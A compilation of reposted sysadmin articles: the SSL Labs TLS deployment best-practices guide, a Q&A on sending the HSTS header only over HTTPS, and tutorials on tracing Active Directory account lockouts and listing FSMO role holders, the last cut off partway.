For most web sites, security provided by 2,048-bit RSA keys is sufficient. The RSA public key algorithm is widely supported, which makes keys of this type a safe default choice. At 2,048 bits, such keys provide about 112 bits of security. If you want more security than this, note that RSA keys don’t scale very well. To get 128 bits of security, you need 3,072-bit RSA keys, which are noticeably slower. ECDSA keys provide an alternative that offers better security and better performance. At 256 bits, ECDSA keys provide 128 bits of security. A small number of older clients don’t support ECDSA, but modern clients do. It’s possible to get the best of both worlds and deploy with RSA and ECDSA keys simultaneously if you don’t mind the overhead of managing such a setup.

1.2 Protect Private Keys

Treat your private keys as an important asset, restricting access to the smallest possible group of employees while still keeping your arrangements practical. Recommended policies include the following:

  • Generate private keys on a trusted computer with sufficient entropy. Some CAs offer to generate private keys for you; run away from them.
  • Password-protect keys from the start to prevent compromise when they are stored in backup systems. Private key passwords don’t help much in production because a knowledgeable attacker can always retrieve the keys from process memory. There are hardware devices (called Hardware Security Modules, or HSMs) that can protect private keys even in the case of server compromise, but they are expensive and thus justifiable only for organizations with strict security requirements.
  • After compromise, revoke old certificates and generate new keys.
  • Renew certificates yearly, and more often if you can automate the process. Most sites should assume that a compromised certificate will be impossible to revoke reliably; certificates with shorter lifespans are therefore more secure in practice.
  • Unless keeping the same keys is important for public key pinning, you should also generate new private keys whenever you’re getting a new certificate.

1.3 Ensure Sufficient Hostname Coverage

Ensure that your certificates cover all the names you wish to use with a site. Your goal is to avoid invalid certificate warnings, which confuse users and weaken their confidence.

Even when you expect to use only one domain name, remember that you cannot control how your users arrive at the site or how others link to it. In most cases, you should ensure that the certificate works with and without the www prefix (e.g., that it works for both example.com and www.example.com). The rule of thumb is that a secure web server should have a certificate that is valid for every DNS name configured to point to it.

Wildcard certificates have their uses, but avoid using them if it means exposing the underlying keys to a much larger group of people, and especially if doing so crosses team or department boundaries. In other words, the fewer people there are with access to the private keys, the better. Also be aware that certificate sharing creates a bond that can be abused to transfer vulnerabilities from one web site or server to all other sites and servers that use the same certificate (even when the underlying private keys are different).

Make sure you add all the necessary domain names to Subject Alternative Name (SAN) since all the latest browsers do not check for Common Name for validation

1.4 Obtain Certificates from a Reliable CA

Select a Certification Authority (CA) that is reliable and serious about its certificate business and security. Consider the following criteria when selecting your CA:

Security posture All CAs undergo regular audits, but some are more serious about security than others. Figuring out which ones are better in this respect is not easy, but one option is to examine their security history, and, more important, how they have reacted to compromises and if they have learned from their mistakes.

Business focus CAs whose activities constitute a substantial part of their business have everything to lose if something goes terribly wrong, and they probably won’t neglect their certificate division by chasing potentially more lucrative opportunities elsewhere.

Services offered At a minimum, your selected CA should provide support for both Certificate Revocation List (CRL) and Online Certificate Status Protocol (OCSP) revocation methods, with rock-solid network availability and performance. Many sites are happy with domain-validated certificates, but you also should consider if you’ll ever require Extended Validation (EV) certificates. In either case, you should have a choice of public key algorithm. Most web sites use RSA today, but ECDSA may become important in the future because of its performance advantages.

Certificate management options If you need a large number of certificates and operate in a complex environment, choose a CA that will give you good tools to manage them.

Support Choose a CA that will give you good support if and when you need it.

Note

For best results, acquire your certificates well in advance and at least one week before deploying them to production. This practice (1) helps avoid certificate warnings for some users who don’t have the correct time on their computers and (2) helps avoid failed revocation checks with CAs who need extra time to propagate new certificates as valid to their OCSP responders. Over time, try to extend this “warm-up” period to 1-3 months. Similarly, don’t wait until your certificates are about to expire to replace them. Leaving an extra several months there would similarly help with people whose clocks are incorrect in the other direction.

1.5 Use Strong Certificate Signature Algorithms

Certificate security depends (1) on the strength of the private key that was used to sign the certificate and (2) the strength of the hashing function used in the signature. Until recently, most certificates relied on the SHA1 hashing function, which is now considered insecure. As a result, we’re currently in transition to SHA256. As of January 2016, you shouldn’t be able to get a SHA1 certificate from a public CA. Leaf and intermediate certificates having SHA1 hashing signature are now considered insecure by browser.

1.6 Use DNS CAA

DNS CAA[8] is a standard that allows domain name owners to restrict which CAs can issue certificates for their domains. In September 2017, CA/Browser Forum mandated CAA support as part of its certificate issuance standard baseline requirements. With CAA in place, the attack surface for fraudulent certificates is reduced, effectively making sites more secure. If the CAs have automated process in place for issuance of certificates, then it should check for DNS CAA record as this would reduce the improper issuance of certificates.

It is recommended to whitelist a CA by adding a CAA record for your certificate. Add CA’s which you trust for issuing you a certificate.

2 Configuration

With correct TLS server configuration, you ensure that your credentials are properly presented to the site’s visitors, that only secure cryptographic primitives are used, and that all known weaknesses are mitigated.

2.1 Use Complete Certificate Chains

In most deployments, the server certificate alone is insufficient; two or more certificates are needed to build a complete chain of trust. A common configuration problem occurs when deploying a server with a valid certificate, but without all the necessary intermediate certificates. To avoid this situation, simply use all the certificates provided to you by your CA in the same sequence.

An invalid certificate chain effectively renders the server certificate invalid and results in browser warnings. In practice, this problem is sometimes difficult to diagnose because some browsers can reconstruct incomplete chains and some can’t. All browsers tend to cache and reuse intermediate certificates.

2.2 Use Secure Protocols

There are six protocols in the SSL/TLS family: SSL v2, SSL v3, TLS v1.0, TLS v1.1, TLS v1.2, and TLS v1.3:

  • SSL v2 is insecure and must not be used. This protocol version is so bad that it can be used to attack RSA keys and sites with the same name even if they are on an entirely different servers (the DROWN attack).
  • SSL v3 is insecure when used with HTTP (the SSLv3 POODLE attack) and weak when used with other protocols. It’s also obsolete and shouldn’t be used.
  • TLS v1.0 and TLS v1.1 are legacy protocol that shouldn’t be used, but it’s typically still necessary in practice. Its major weakness (BEAST) has been mitigated in modern browsers, but other problems remain. TLS v1.0 has been deprecated by PCI DSS. Similarly, TLS v1.0 and TLS v1.1 has been deprecated in January 2020 by modern browsers. Check the SSL Labs blog link
  • TLS v1.2 and v1.3 are both without known security issues.

TLS v1.2 or TLS v1.3 should be your main protocol because these version offers modern authenticated encryption (also known as AEAD). If you don’t support TLS v1.2 or TLS v1.3 today, your security is lacking.

In order to support older clients, you may need to continue to support TLS v1.0 and TLS v1.1 for now. However, you should plan to retire TLS v1.0 and TLS v1.1 in the near future. For example, the PCI DSS standard will require all sites that accept credit card payments to remove support for TLS v1.0 by June 2018. Similarly, modern browsers will remove the support for TLS v1.0 and TLS v1.1 by January 2020.

Benefits of using TLS v1.3:

  • Improved performance i.e improved latency
  • Improved security
  • Removed obsolete/insecure features like cipher suites, compression etc.

2.3 Use Secure Cipher Suites

To communicate securely, you must first ascertain that you are communicating directly with the desired party (and not through someone else who will eavesdrop) and exchanging data securely. In SSL and TLS, cipher suites define how secure communication takes place. They are composed from varying building blocks with the idea of achieving security through diversity. If one of the building blocks is found to be weak or insecure, you should be able to switch to another.

You should rely chiefly on the AEAD suites that provide strong authentication and key exchange, forward secrecy, and encryption of at least 128 bits. Some other, weaker suites may still be supported, provided they are negotiated only with older clients that don’t support anything better.

There are several obsolete cryptographic primitives that must be avoided:

  • Anonymous Diffie-Hellman (ADH) suites do not provide authentication.
  • NULL cipher suites provide no encryption.
  • Export cipher suites are insecure when negotiated in a connection, but they can also be used against a server that prefers stronger suites (the FREAK attack).
  • Suites with weak ciphers (112 bits or less) use encryption that can easily be broken are insecure.
  • RC4 is insecure.
  • 64-bit block cipher (3DES / DES / RC2 / IDEA) are weak.
  • Cipher suites with RSA key exchange are weak i.e. TLS_RSA

There are several cipher suites that must be preferred:

  • AEAD (Authenticated Encryption with Associated Data) cipher suites – CHACHA20_POLY1305, GCM and CCM
  • PFS (Perfect Forward Secrecy) ciphers – ECDHE_RSA, ECDHE_ECDSA, DHE_RSA, DHE_DSS, CECPQ1 and all TLS 1.3 ciphers

Use the following suite configuration, designed for both RSA and ECDSA keys, as your starting point:

TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256

Warning

We recommend that you always first test your TLS configuration in a staging environment, transferring the changes to the production environment only when certain that everything works as expected. Please note that the above is a generic list and that not all systems (especially the older ones) support all the suites. That’s why it’s important to test first.

The above example configuration uses standard TLS suite names. Some platforms use nonstandard names; please refer to the documentation for your platform for more details. For example, the following suite names would be used with OpenSSL:

ECDHE-ECDSA-AES128-GCM-SHA256
ECDHE-ECDSA-AES256-GCM-SHA384
ECDHE-ECDSA-AES128-SHA
ECDHE-ECDSA-AES256-SHA
ECDHE-ECDSA-AES128-SHA256
ECDHE-ECDSA-AES256-SHA384
ECDHE-RSA-AES128-GCM-SHA256
ECDHE-RSA-AES256-GCM-SHA384
ECDHE-RSA-AES128-SHA
ECDHE-RSA-AES256-SHA
ECDHE-RSA-AES128-SHA256
ECDHE-RSA-AES256-SHA384
DHE-RSA-AES128-GCM-SHA256
DHE-RSA-AES256-GCM-SHA384
DHE-RSA-AES128-SHA
DHE-RSA-AES256-SHA
DHE-RSA-AES128-SHA256
DHE-RSA-AES256-SHA256

2.4 Select Best Cipher Suites

In SSL v3 and later protocol versions, clients submit a list of cipher suites that they support, and servers choose one suite from the list to use for the connection. Not all servers do this well, however; some will select the first supported suite from the client’s list. Having servers actively select the best available cipher suite is critical for achieving the best security.

2.5 Use Forward Secrecy

Forward secrecy (sometimes also called perfect forward secrecy) is a protocol feature that enables secure conversations that are not dependent on the server’s private key. With cipher suites that do not provide forward secrecy, someone who can recover a server’s private key can decrypt all earlier recorded encrypted conversations. You need to support and prefer ECDHE suites in order to enable forward secrecy with modern web browsers. To support a wider range of clients, you should also use DHE suites as fallback after ECDHE. Avoid the RSA key exchange unless absolutely necessary. My proposed default configuration in Section 2.3 contains only suites that provide forward secrecy.

2.6 Use Strong Key Exchange

For the key exchange, public sites can typically choose between the classic ephemeral Diffie-Hellman key exchange (DHE) and its elliptic curve variant, ECDHE. There are other key exchange algorithms, but they’re generally insecure in one way or another. The RSA key exchange is still very popular, but it doesn’t provide forward secrecy.

In 2015, a group of researchers published new attacks against DHE; their work is known as the Logjam attack.[2] The researchers discovered that lower-strength DH key exchanges (e.g., 768 bits) can easily be broken and that some well-known 1,024-bit DH groups can be broken by state agencies. To be on the safe side, if deploying DHE, configure it with at least 2,048 bits of security. Some older clients (e.g., Java 6) might not support this level of strength. For performance reasons, most servers should prefer ECDHE, which is both stronger and faster. The secp256r1 named curve (also known as P-256) is a good choice in this case.

2.7 Mitigate Known Problems

There have been several serious attacks against SSL and TLS in recent years, but they should generally not concern you if you’re running up-to-date software and following the advice in this guide. (If you’re not, I’d advise testing your systems using SSL Labs and taking it from there.) However, nothing is perfectly secure, which is why it is a good practice to keep an eye on what happens in security. Promptly apply vendor patches if and when they become available; otherwise, rely on workarounds for mitigation.

3 Performance

Security is our main focus in this guide, but we must also pay attention to performance; a secure service that does not satisfy performance criteria will no doubt be dropped. With proper configuration, TLS can be quite fast. With modern protocols—for example, HTTP/2—it might even be faster than plaintext communication.

3.1 Avoid Too Much Security

The cryptographic handshake, which is used to establish secure connections, is an operation for which the cost is highly influenced by private key size. Using a key that is too short is insecure, but using a key that is too long will result in “too much” security and slow operation. For most web sites, using RSA keys stronger than 2,048 bits and ECDSA keys stronger than 256 bits is a waste of CPU power and might impair user experience. Similarly, there is little benefit to increasing the strength of the ephemeral key exchange beyond 2,048 bits for DHE and 256 bits for ECDHE. There are no clear benefits of using encryption above 128 bits.

3.2 Use Session Resumption

Session resumption is a performance-optimization technique that makes it possible to save the results of costly cryptographic operations and to reuse them for a period of time. A disabled or nonfunctional session resumption mechanism may introduce a significant performance penalty.

3.3 Use WAN Optimization and HTTP/2

These days, TLS overhead doesn’t come from CPU-hungry cryptographic operations, but from network latency. A TLS handshake, which can start only after the TCP handshake completes, requires a further exchange of packets and is more expensive the further away you are from the server. The best way to minimize latency is to avoid creating new connections—in other words, to keep existing connections open for a long time (keep-alives). Other techniques that provide good results include supporting modern protocols such as HTTP/2 and using WAN optimization (usually via content delivery networks).

3.4 Cache Public Content

When communicating over TLS, browsers might assume that all traffic is sensitive. They will typically use the memory to cache certain resources, but once you close the browser, all the content may be lost. To gain a performance boost and enable long-term caching of some resources, mark public resources (e.g., images) as public.

3.5 Use OCSP Stapling

OCSP stapling is an extension of the OCSP protocol that delivers revocation information as part of the TLS handshake, directly from the server. As a result, the client does not need to contact OCSP servers for out-of-band validation and the overall TLS connection time is significantly reduced. OCSP stapling is an important optimization technique, but you should be aware that not all web servers provide solid OCSP stapling implementations. Combined with a CA that has a slow or unreliable OCSP responder, such web servers might create performance issues. For best results, simulate failure conditions to see if they might impact your availability.

3.6 Use Fast Cryptographic Primitives

In addition to providing the best security, my recommended cipher suite configuration also provides the best performance. Whenever possible, use CPUs that support hardware-accelerated AES. After that, if you really want a further performance edge (probably not needed for most sites), consider using ECDSA keys.

4 HTTP and Application Security

The HTTP protocol and the surrounding platform for web application delivery continued to evolve rapidly after SSL was born. As a result of that evolution, the platform now contains features that can be used to defeat encryption. In this section, we list those features, along with ways to use them securely.

4.1 Encrypt Everything

The fact that encryption is optional is probably one of the biggest security problems today. We see the following problems:

  • No TLS on sites that need it
  • Sites that have TLS but that do not enforce it
  • Sites that mix TLS and non-TLS content, sometimes even within the same page
  • Sites with programming errors that subvert TLS

Although many of these problems can be mitigated if you know exactly what you’re doing, the only way to reliably protect web site communication is to enforce encryption throughout—without exception.

4.2 Eliminate Mixed Content

Mixed-content pages are those that are transmitted over TLS but include resources (e.g., JavaScript files, images, CSS files) that are not transmitted over TLS. Such pages are not secure. An active man-in-the-middle (MITM) attacker can piggyback on a single unprotected JavaScript resource, for example, and hijack the entire user session. Even if you follow the advice from the previous section and encrypt your entire web site, you might still end up retrieving some resources unencrypted from third-party web sites.

4.3 Understand and Acknowledge Third-Party Trust

Web sites often use third-party services activated via JavaScript code downloaded from another server. A good example of such a service is Google Analytics, which is used on large parts of the Web. Such inclusion of third-party code creates an implicit trust connection that effectively gives the other party full control over your web site. The third party may not be malicious, but large providers of such services are increasingly seen as targets. The reasoning is simple: if a large provider is compromised, the attacker is automatically given access to all the sites that depend on the service.

If you follow the advice from Section 4.2, at least your third-party links will be encrypted and thus safe from MITM attacks. However, you should go a step further than that: learn what services you use and remove them, replace them with safer alternatives, or accept the risk of their continued use. A new technology called subresource integrity (SRI) could be used to reduce the potential exposure via third-party resources.[3]

4.4 Secure Cookies

To be properly secure, a web site requires TLS, but also that all its cookies are explicitly marked as secure when they are created. Failure to secure the cookies makes it possible for an active MITM attacker to tease some information out through clever tricks, even on web sites that are 100% encrypted. For best results, consider adding cryptographic integrity validation or even encryption to your cookies.

4.5 Secure HTTP Compression

The 2012 CRIME attack showed that TLS compression can’t be implemented securely. The only solution was to disable TLS compression altogether. The following year, two further attack variations followed. TIME and BREACH focused on secrets in HTTP response bodies compressed using HTTP compression. Unlike TLS compression, HTTP compression is a necessity and can’t be turned off. Thus, to address these attacks, changes to application code need to be made.[4]

TIME and BREACH attacks are not easy to carry out, but if someone is motivated enough to use them, the impact is roughly equivalent to a successful Cross-Site Request Forgery (CSRF) attack.

4.6 Deploy HTTP Strict Transport Security

HTTP Strict Transport Security (HSTS) is a safety net for TLS. It was designed to ensure that security remains intact even in the case of configuration problems and implementation errors. To activate HSTS protection, you add a new response header to your web sites. After that, browsers that support HSTS (all modern browsers at this time) enforce it.

The goal of HSTS is simple: after activation, it does not allow any insecure communication with the web site that uses it. It achieves this goal by automatically converting all plaintext links to secure ones. As a bonus, it also disables click-through certificate warnings. (Certificate warnings are an indicator of an active MITM attack. Studies have shown that most users click through these warnings, so it is in your best interest to never allow them.)

Adding support for HSTS is the single most important improvement you can make for the TLS security of your web sites. New sites should always be designed with HSTS in mind and the old sites converted to support it wherever possible and as soon as possible. For best security, consider using HSTS preloading,[5] which embeds your HSTS configuration in modern browsers, making even the first connection to your site secure.

The following configuration example activates HSTS on the main hostname and all its subdomains for a period of one year, while also allowing preloading:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

4.7 Deploy Content Security Policy

Content Security Policy (CSP) is a security mechanism that web sites can use to restrict browser operation. Although initially designed to address Cross-Site Scripting (XSS), CSP is constantly evolving and supports features that are useful for enhancing TLS security. In particular, it can be used to restrict mixed content when it comes to third-party web sites, for which HSTS doesn’t help.

To deploy CSP to prevent third-party mixed content, use the following configuration:

Content-Security-Policy: default-src https: 'unsafe-inline' 'unsafe-eval';
                         connect-src https: wss:

Note

This is not the best way to deploy CSP. In order to provide an example that doesn’t break anything except mixed content, I had to disable some of the default security features. Over time, as you learn more about CSP, you should change your policy to bring them back.

4.8 Do Not Cache Sensitive Content

All sensitive content must be communicated only to the intended parties and treated accordingly by all devices. Although proxies do not see encrypted traffic and cannot share content among users, the use of cloud-based application delivery platforms is increasing, which is why you need to be very careful when specifying what is public and what is not.

4.9 Consider Other Threats

TLS is designed to address only one aspect of security—confidentiality and integrity of the communication between you and your users—but there are many other threats that you need to deal with. In most cases, that means ensuring that your web site does not have other weaknesses.

5 Validation

With many configuration parameters available for tweaking, it is difficult to know in advance what impact certain changes will have. Further, changes are sometimes made accidentally; software upgrades can introduce changes silently. For that reason, we advise that you use a comprehensive SSL/TLS assessment tool initially to verify your configuration to ensure that you start out secure, and then periodically to ensure that you stay secure. For public web sites, we recommend the free SSL Labs server test.[6]

6 Advanced Topics

The following advanced topics are currently outside the scope of our guide. They require a deeper understanding of SSL/TLS and Public Key Infrastructure (PKI), and they are still being debated by experts.

6.1 Public Key Pinning

Public key pinning is designed to give web site operators the means to restrict which CAs can issue certificates for their web sites. This feature has been deployed by Google for some time now (hardcoded into their browser, Chrome) and has proven to be very useful in preventing attacks and making the public aware of them. In 2014, Firefox also added support for hardcoded pinning. A standard called Public Key Pinning Extension for HTTP[7] is now available. Public key pinning addresses the biggest weakness of PKI (the fact that any CA can issue a certificate for any web site), but it comes at a cost; deploying requires significant effort and expertise, and creates risk of losing control of your site (if you end up with invalid pinning configuration). You should consider pinning largely only if you’re managing a site that might be realistically attacked via a fraudulent certificate.

6.2 DNSSEC and DANE

Domain Name System Security Extensions (DNSSEC) is a set of technologies that add integrity to the domain name system. Today, an active network attacker can easily hijack any DNS request and forge arbitrary responses. With DNSSEC, all responses can be cryptographically tracked back to the DNS root. DNS-based Authentication of Named Entities (DANE) is a separate standard that builds on top of DNSSEC to provide bindings between DNS and TLS. DANE could be used to augment the security of the existing CA-based PKI ecosystem or bypass it altogether.

Even though not everyone agrees that DNSSEC is a good direction for the Internet, support for it continues to improve. Browsers don’t yet support either DNSSEC or DANE (preferring similar features provided by HSTS and HPKP instead), but there is some indication that they are starting to be used to improve the security of email delivery.

7 Changes

The first release of this guide was on 24 February 2012. This section tracks the document changes over time, starting with version 1.3.

Version 1.3 (17 September 2013)

The following changes were made in this version:

  • Recommend replacing 1024-bit certificates straight away.
  • Recommend against supporting SSL v3.
  • Remove the recommendation to use RC4 to mitigate the BEAST attack server-side.
  • Recommend that RC4 is disabled.
  • Recommend that 3DES is disabled in the near future.
  • Warn about the CRIME attack variations (TIME and BREACH).
  • Recommend supporting forward secrecy.
  • Add discussion of ECDSA certificates.

Version 1.4 (8 December 2014)

The following changes were made in this version:

  • Discuss SHA1 deprecation and recommend migrating to the SHA2 family.
  • Recommend that SSL v3 is disabled and mention the POODLE attack.
  • Expand Section 3.1 to cover the strength of the DHE and ECDHE key exchanges.
  • Recommend OCSP Stapling as a performance-improvement measure, promoting it to Section 3.5.

Version 1.5 (8 June 2016)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Recommended use of authenticated cipher suites.
  • Spent more time discussing key exchange strength and the Logjam attack.
  • Removed the recommendation to disable client-initiated renegotiation. Modern software does this anyway, and it might be impossible or difficult to disable it with something older. At the same time, the DoS vector isn’t particularly strong. Overall, I feel it’s better to spend available resources fixing something else.
  • Added a warning about flaky OCSP stapling implementations.
  • Added mention of subresource integrity enforcement.
  • Added mention of cookie integrity validation and encryption.
  • Added mention of HSTS preloading.
  • Recommended using CSP for better handling of third-party mixed content.
  • Mentioned FREAK, Logjam, and DROWN attacks.
  • Removed the section that discussed mitigation of various TLS attacks, which are largely obsolete by now, especially if the advice presented here is followed. Moved discussion of CRIME variants into a new section.
  • Added a brief discussion of DNSSEC and DANE to the Advanced section.

Version 1.6 (15 January 2020)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Added details to use SAN (Subject Alternative Names) since the Common Name is deprecated by latest browsers.
  • SHA1 signature deprecation for leaf and intermediate certificate
  • Added DNS CAA information, recommened the use of it.
  • Added information about the extra download of missing intermediate certificate and the sequence of it.
  • Recommended the use of TLS 1.3
  • Recommended not to use the legacy protocol TLS v1.0 and TLS v1.1
  • Improved the secure cipher suites section with more information and newly discovered weak/insecure cipher.
  • Updated HSTS preload footnotes link.

Acknowledgments

Special thanks to Marsh Ray, Nasko Oskov, Adrian F. Dimcev, and Ryan Hurst for their valuable feedback and help in crafting the initial version of this document. Also thanks to many others who generously share their knowledge of security and cryptography with the world. The guidelines presented here draw on the work of the entire security community.

About SSL Labs

SSL Labs (www.ssllabs.com) is Qualys’s research effort to understand SSL/TLS and PKI as well as to provide tools and documentation to assist with assessment and configuration. Since 2009, when SSL Labs was launched, hundreds of thousands of assessments have been performed using the free online assessment tool. Other projects run by SSL Labs include periodic Internet-wide surveys of TLS configuration and SSL Pulse, a monthly scan of about 150,000 most popular TLS-enabled web sites in the world.

About Qualys

Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud-based security and compliance solutions with over 9,300 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The Qualys Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accenture, BT, Cognizant Technology Solutions, Deutsche Telekom, Fujitsu, HCL, HP Enterprise, IBM, Infosys, NTT, Optiv, SecureWorks, Tata Communications, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA). For more information, please visit www.qualys.com.

[1] Transport Layer Security (TLS) Parameters (IANA, retrieved 18 March 2016)

[2] Weak Diffie-Hellman and the Logjam Attack (retrieved 16 March 2016)

[3] Subresource Integrity (Mozilla Developer Network, retrieved 16 March 2016)

[4] Defending against the BREACH Attack (Qualys Security Labs; 7 August 2013)

[5] HSTS Preload List (Google developers, retrieved 16 March 2016)

[6] SSL Labs (retrieved 16 March 2016)

[7] RFC 7469: Public Key Pinning Extension for HTTP (Evans et al, April 2015)

[8] RFC 6844: DNS CAA (Evans et al, January 2013)

Source :
https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

Warning: Unnecessary HSTS header over HTTP

we would like to add the HSTS header to our page https://www.wipfelglueck.de
Our page is running on a shared server, so we don’t have access to the httpd.conf. We tried to enable this header via the .htaccess file like this:

<ifmodule mod_headers.c>
  DefaultLanguage de
  Header set X-XSS-Protection "1; mode=block"
  Header set X-Frame-Options "sameorigin"
  Header set X-Content-Type-Options "nosniff"
  
  Header set X-Permitted-Cross-Domain-Policies "none"
  
  Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
  
  Header set Referrer-Policy: no-referrer
  
  <FilesMatch "\.(js|css|xml|gz)$"> 
    Header append Vary Accept-Encoding 
  </FilesMatch> 
   
  <filesMatch ".(ico|jpg|jpeg|png|gif|webp)$">
   Header set Cache-Control "max-age=2592000, public"
  </filesMatch>
  <filesMatch ".(css|js|json|html)$">
   Header set Cache-Control "max-age=604800, public"
  </filesMatch>
</IfModule>

When we check the page we receive the warning in subject with this text:
“The HTTP page at http://wipfelglueck.de sends an HSTS header. This has no effect over HTTP, and should be removed.”

I tried some ways to solve this, but was not successful so far. In the web I can’t find a solution, so I would be happy if you could give me a hint on this!

Thank you very much!!


Thank you very much for your respond!
With the header:

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

or

Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

there is no error, the page runs, but when I check the page this error is mentioned:

Error: No HSTS header
Response error: No HSTS header is present on the response.

That’s strange. What did I wrong?

Answer

You can conditionally set headers using env=

Header always set Strict-Transport-Security "..." env=HTTPS

(you can use both always and env= simultaneously, the former only filters by response status)

That being said, do not optimize for benchmarks or compliance checkmarks. This header does not do anything, caring about it just takes away attention from things that do have effects. This header simply has no effect when not sent via secured transports – but as these days, (almost) all plaintext requests should just redirect to https://, this is true for (almost) any response header in http://.

Source :
https://bootpanic.com/warning-unnecessary-hsts-header-over-http/

How to Find the Source of Account Lockouts in Active Directory

In this post, you will learn how to find the source of account lockouts in Active Directory.

Here are the steps to find the source of account lockouts:

Users locking their accounts is a common problem, it’s one of the top calls to the helpdesk.

What is frustrating is when you unlock a user’s account and it keeps randomly locking. The user could be logged into multiple devices (phone, computer, application, and so on) and when they change their password it will cause ongoing lock-out issues.

This guide will help you to track down the source of those lockouts.

Check it out:

Step 1: Enabling Auditing Logs

The first step to tracking down the source of account lockouts is to enable auditing. If you do not turn on the proper auditing logs then the lockout events will not be logged.

Here are the steps to turn on the audit logs:

1. Open Group Policy Management Console

This can be from the domain controller or any computer that has the RSAT tools installed.

2. Modify Default Domain Controllers Policy

Browse to the Default Domain Controllers Policy, right-click, and select edit. You can also create a new GPO on the “Domain Controllers” OU if you prefer to not edit the default GPO.

3. Modify the Advanced Audit Policy Configuration

Browse to computer configuration -> Policies -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Account Management

Enable success and failure for the “Audit User Account Management” policy.

Next, enable the following:

computer configuration -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Account Logon

Enable Success and Failure for “Audit Kerberos Authentication Service.

Auditing is now turned on and event 4740 will be logged in the security events logs when an account is locked out. In addition, the Kerberos logs are enabling which will log authentication failures with the lockout. Sometimes event 4740 does not log the source computer and the Kerberos logs provide additional details.

Step 2: Using the User Unlock GUI Tool to Find the Source of Account Lockouts

This step uses the User Unlock Tool to find the event ID 4740 and other event IDs that will help troubleshoot lockouts.

I created this tool to make it super easy for any staff member to unlock accounts, reset passwords and find the source of account lockouts. It also has some additional features to help find the source of lockouts.

This is a much easier option than PowerShell.

1. Open the AD Pro Toolkit

You can download a free trial here.

Click on the “User Unlock” tool in the left side menu.

Step 2. Select Troubleshoot Lockouts

Select Troubleshoot lockouts and click run

You will now have a list of events that will show the source of a lockout or the source of bad authentication attempts.

In the above screenshot, you can see the account “robert.allen” lockout came from computer PC1.

There will be times when event 4740 does not show the source computer. When that happens you can use the other logged events to help troubleshoot log out events. For example, if the above screenshot had no event 4740 I can look at 4771 and see the failed authentication attempt was from a computer with the IP 192.168.100.20.

In addition, you can unlock the account and reset the password all from one tool. The tool will display all locked accounts, you can select a single account or multiple accounts to unlock.

The unlock tool is part of the AD Pro Toolkit. Download your free trial here.

Step 3: Using PowerShell to Find the Source of Account Lockouts

Both the PowerShell and the GUI tool need auditing turned before the domain controllers will log any useful information.

1. Find the Domain Controller with the PDC Emulator Role

If you have a single domain controller (shame on you) then you can skip to the next step…hopefully you have at least two DCs.

The DC with the PDC emulator role will record every account lockout with an event ID of 4740.

To find the DC that has the PDCEmulator role run this PowerShell command

get-addomain | select PDCEmulator

2: Finding event ID 4740 using PowerShell

All of the details you need are in event 4740. Now that you know which DC holds the pdcemulator role you can filter the logs for this event.

On the DC holding the PDCEmulator role open PowerShell and run this command

Get-WinEvent -FilterHashtable @{logname=’security’; id=4740}

This will search the security event logs for event ID 4740. If you have any account lockouts you should see a list like the below.

To display the details of these events and get the source of the lockout use this command.

Get-WinEvent -FilterHashtable @{logname=’security’; id=4740} | fl

This will display the caller computer name of the lockout. This is the source of the user account lockout.

You can also open the event log and filter the events for 4740

Although this method works it takes a few manual steps and can be time consuming. You may also have staff that is not familiar with PowerShell and need to perform other functions like unlock or reset the user’s account.

That is why I created the Active Directory User Unlock GUI tool. This tool makes it super easy for staff to find all locked users and the source of account lockouts.

I hope you found this article useful. If you have questions or comments let me know by posting a comment below.

Source :
https://activedirectorypro.com/find-the-source-of-account-lockouts/

How to Transfer FSMO Roles (2 Easy Steps)

how to transfer fsmo roles

Do you need to transfer FSMO roles to another domain controller?

No problem, it is very is to do.

In this tutorial, I’ll show you step-by-step instructions to transfer the FSMO roles from one domain controller to another. I’ll show you two methods: the first is using PowerShell and the second is using the ADUC GUI.

Why Transfer FSMO roles?

By default, when Active Directory is installed all five FSMO roles are assigned to the first domain controller in the forest root domain. Transferring FSMO roles is often needed for several reasons including:

It is recommended to only transfer FSMO roles when the current role holder is operational and is accessible on the network. For a complete list of considerations see the MS article Transfer or seize FSMO Roles in Active Directory Services.

Step 1: List Current FSMO Role Holders

Before moving the FSMO roles it is a good idea to check which domain controllers hold which roles.

You can list which domain controllers hold FSMO roles with these two PowerShell commands:

Get domain level FSMO roles

get-addomain | select InfrastructureMaster, PDCEmulator, RIDMaster

Get forest level FSMO roles

Get-ADForest | select DomainNamingMaster, SchemaMaster

Below is a screenshot of the results in my domain.

get fsmo roles

List of installed roles in my domain:

